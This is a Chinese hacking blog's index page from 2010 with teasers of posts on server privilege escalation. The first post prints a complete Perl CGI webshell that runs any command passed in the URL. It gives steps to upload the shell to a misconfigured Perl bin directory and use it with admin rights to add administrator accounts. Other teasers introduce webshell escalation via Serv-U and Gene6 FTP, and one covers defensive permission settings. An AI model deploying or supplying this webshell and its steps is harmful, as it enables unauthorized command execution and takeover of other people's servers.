分类: |
  • 1

利用Perl提权

作者:admin 日期:2010-05-30

 Perl 就是 Practical Extraction and Reporting Language 的简称,是一种最广泛应用于语法分析和 World Wide Web 的编程语言。它起源于 awk、C、sh 和 sed 语言,然而,它的应用开发远比其他任何一种面向对象编程语言更加容易。

  Perl 语言由 Larry Wall 创建,最初作为一种实用解释语言。其主要功能最初是用于分析基于文本的数据和生成这些数据的统计或结果。随着 Internet 的普及推广,我们已经感受到 Perl 在 CGI 编程和处理格式数据上的强大功能。由于 Perl 对 process、文档和文字有很强的处理、变换能力,因此凡是有关快速原型设计、系统工具、软件工具、系统管理、资料库连结、图像程式设计、网络连结和 WWW 程式设计等之类的任务,都特别适合用 Perl 来完成

c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)cgiwebshell放到PERL目录下的BIN目中

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "

\r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

保存为cmd.pl上传至BIN目录执行,

(如果不能运行,可以试试改为cgi 扩展呢,把刚才的 pl文件改为 cgi文件)

在IE浏览窗口中提交提交 http://anyhost//cmd.pl?dir 即可开始执行命令,请注意这个SHELL是具有ADMIN权限的,能够添加帐号并加入管理员组,书写规则是在?后加入你需要执行的命令.

为什么安装PERL能导至黑客在服务器上提升权限呢?原理很简单,因为PERL在默认安装时BIN目录是具有EVERYONE的完全控制权限和CGI执行权限的,所以能执行任意命令,这是一个NTFS权限导至的提权漏洞.

查看更多...

Tags: 权限 黑客 提权 脚本

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8564

最新最全的WEBSHELL提权方法【1】

作者:admin 日期:2010-03-26

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用 
 WEBSHELL权限提升技巧 
c: d: e:..... 
C:\Documents and Settings\All Users\「开始」菜单\程序\ 
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, 

查看更多...

Tags: webshell 提权 教程 权限 黑客

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 11358

拒绝黑客入侵 设网站文件目录与数据库权限

作者:admin 日期:2010-03-24

在网站运营的过程中,最令站长头痛的可能就是网站被入侵了,实际上,如果提前设置好网站的目录权限,就可以保证网站能够经受大部分的漏洞攻击。本文介绍了设置文件目录和数据库权限的方法,设置权限的方法也并不难,只要根据本文一步步进行操作,就可以大大提高网站的安全性。

  网站目录权限的设置方法

  大多数网站都是采用程序搭建,对于系统管理的目录,可以将其设置为可读也可执行脚本,但不可写入的权限;但是对于放置网页静态文件的目录,以及放置图片文件、模板文件的目录,就可以将其设置为可读写但不可执行的系统权限。在权限分配明确之后,即使系统被入侵,也只能浏览而无法对文件进行直接的操作。

查看更多...

Tags: 权限 黑客

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6083

Gene6 FTP Server提权方法

作者:admin 日期:2010-03-23

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
by:晓华
Gene6 FTP Server这个FTP软件简单易用,比SU的安全性高的多.
他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.
这一点和我们的SU一样,SU的管理端口是43958.

查看更多...

Tags: gene6 ftp server ftp 软件 提权 权限 黑客

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8860

一些webshell提权的方法

作者:admin 日期:2009-11-28

       现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest[b]权限[/b]是简单的,像我们在入侵网站过程中,获取[b]webshell[/b]是简单的,但是当由[b]webshell[/b]的guest权限向system[b]权限提升[/b]时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。

首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是[b]webshell下的服务器提权[/b]方法。

下面我们就进入主题,对[b]webshell的提权[/b]方法!

查看更多...

Tags: 权限 黑客 提权 webshell

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9224
  • 1